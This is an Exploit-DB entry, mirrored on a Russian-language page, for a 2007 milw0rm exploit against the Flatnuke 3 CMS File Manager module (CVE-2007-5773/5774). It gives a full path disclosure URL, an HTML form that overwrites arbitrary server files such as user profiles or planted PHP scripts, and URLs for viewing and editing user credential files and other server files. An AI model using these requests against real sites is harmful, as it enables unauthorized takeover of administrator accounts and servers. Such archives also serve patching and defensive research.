- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4561
- Проверка EDB
-
- Пройдено
- Автор
- KINGOFTHEWORLD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-5774 cve-2007-5773
- Дата публикации
- 2007-10-23
Код:
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Flatnuke 3 Remote Command Execution / Privilege Escalation
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
Corrupted Module: File Manager
---------------------------------------------------------------
PoC:
Flatnuke doesn't use any database, so the registred users informations
are located in a php file like
/flatnuke3/misc/fndatabase/users/username.php . By the file manager
module, the administrator, can upload, make, edit or delete some files,
only while he's logging in. By the way, making a post whit the same
request of that module, we can replace or edit a file, for example an
user profile. So, there are a lot of way to exploit this vulnerability,
we can edit the admin credentials, we can upload a malicious php script,
and much more... But to exploit this vulnerability, we need to know the
script path. We can get it generating a full path disclosure.
---------------------------------------------------------------
Full Path Disclosure Example:
http://[target]/[flatnuke3_path]/index.php?mod=[forum_path]&op=disc&argumentname=[a_casual_char]
---------------------------------------------------------------
File Replace Exploit:
<form method="post" action="http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&op="><textarea id="body" name="body" cols="90" rows="35">
</textarea><br><input value="Save" type="submit"><input type="reset">
<input name="opmod" value="save" type="hidden">
<input name="ffile" value="[file_name].php" type="hidden">
<input name="dir" value="/[script_path]/[file_path]" type="hidden"><input class="button" onclick="history.back()" value="Annulla" type="button"></form>
---------------------------------------------------------------
User Credential View/Edit Exploit:
http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/[script_path]/[flatnuke3_path]/misc/fndatabase/users/&ffile=[username].php&opmod=open&op=
Or, for example u can view and edit a file located on the server:
http://[target]/[flatnuke3_path]/index.php?mod=none_filemanager&dir=/[script_path]/&ffile=[file]&opmod=open&op=
---------------------------------------------------------------
Do you wanna another way to exploit this vuln? Use your brain! :P
---------------------------------------------------------------
# milw0rm.com [2007-10-23]
- Источник
- www.exploit-db.com